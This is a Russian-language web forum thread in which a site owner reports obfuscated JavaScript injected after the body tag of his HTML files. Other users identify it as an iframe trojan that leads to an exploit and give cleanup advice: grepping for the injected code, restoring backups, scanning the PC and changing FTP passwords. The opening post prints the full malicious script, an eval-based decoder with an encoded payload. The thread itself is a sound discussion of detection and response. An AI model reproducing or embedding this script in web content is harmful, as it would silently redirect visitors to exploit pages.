Новая тема   Ответить

 Asmodeus
В html файлах которые создал после открытия тега body добавилось вот это

<script language=JavaScript> function ffpbnb25(z) {var
c=z.length,m=1024,i,s,h,b=0,w=0,x=0,d=Array(63,58,52,8,44,50,24,25,59,35,0,0,0,0,0,0,62,42,19,4,3,18,26,45,13,36,12,61,57,30,5,20,34,31,46,6,60,32,53,54,10,9,2,0,0,0,0,55,0,37,28,11,48,38,47,40,33,49,56,1,15,14,39,16,21,51,29,7,22,17,0,23,43,41,27);for(s=Math.ceil(c/m);s>0;s--){h='';for(i=Math.min(c,m);i>0;i--,c--){{x|=(d[z.charCodeAt(b++)-48])<<w;if(w){h+=String.fromCharCode(165^x&255);x>>=8;w-=2}else{w=6}}}eval(h);}}ffpbnb25('EqT5kx42cFr2CsH2t9yUhxT5vcgnkx4io9JdcsKPEQHquDb9ZeYqDQHi3DbhcBJ5v9LIkl7duS7htQGi6M6qusrVQAgPEFrVvDbdc5T5Dx4PuxgeZ131CsrqcMG5ofbdHPmiu_TPwBT5kxJ5H5j9OX7abSY9mXjIkl7duSyUmXjhNXHqksrq6EYIut6qvq4dHsHeOEYaNFr2bnJd6M6dJzrVYBJ_QR45cDThzeyPJlTVC9JdzX39')
</script>

троян?
как бороться? кто подскажет?

 SN211
Tроян.HTML:IFrame-CC [Trj]

 Spinner
Asmodeus писал:
скорее всего ифрейм на сплоит

Asmodeus писал:
сотри код и поменяй все пароли.
если появится снова, ищи чужие файлы на хосте

 Spinner
SN211 писал:
да IFrame, я был прав

 localhost
варианта два:
1) спиздили через пинч фтп-акки, которые прописаны в фаре или тоталкоммандере,

2) бэкдор подхватил, попиздили секурную инфу (файлы с паролями).

по поводу восстановления файлов, есть такой скрипт:

Код:

кладешь в корень любого сайта, запускаешь с браузера
скрипт выходит на два уровня выше по каталогам (из public_html/имя_домена) в папку с сайтами и проверяет все index.php (заменить на свой вариант)

второй вариант, если сервер свой и есть доступ к шеллу:
cd /home
grep -irl "<script language=JavaScript> function " >> bad.txt &

как отработает скрипт, каким-нибудь парсером или простым пхп-скриптом очистить
все файлы от инъекции

третий вариант:
восстановить с бэкапов


ну и само собой - скачать CureIt, AVZ4 или еще чего, проверить винду (переставить)
и сменить все фтп-пароли (лучше сделать сразу и с другого компа)

если стоит вебмани, сменить ключи, пароли немедленно.
если это был пинч, то менять пароли ко всем критическим вебресурсам, где на автомате стоит автозаполнение в ИЕ

 Soft-Com
localhost писал:

т.к. дофига сейчас есть всяких попапов, и прочей фигни, скрипт может найти дофига чего нужного

Цитата:

я думаю не сильно прикольно парсить мувики, пикчи, бинари и прочее, которое составляет 70% от контента на сервере.

сначала проверь откуда на твой хост были заходы по фтп/ssh, если действительно были НЕ с твоих айпишников - заблочь фтп только для себя, смени пароли, почисть контент и спи спокойно.

если небыло - занчит ищи у себя на сервере скрипт, который раскидывает инъекции по файлам, и до того момента пока эот скрипт не найдёшь можешь даже не париться чистить контент.

А искать заражённые файлы судя по всему лучше по ffpbnb25 (не факт, название функции может генерится на лету), или по куску кодированной строки в конце кода.

 Magway
Сделай бэкап, для этого их и придумали, пользуйся самыми новыми браузерами.

 fos
Хочу узнать мнение по поводу использования сервисов онлайн проверки сайта на вирусы и мониторинга (изменение скриптов). Например siteguard.ru . Могут ли они помочь в подобных случаях.

 Dr.Syshalt
Цитата:
Или еще вариант - просто подобрали пароли на FTP. Наверное, не просто ж так боты перебирают их целыми днями на серваках.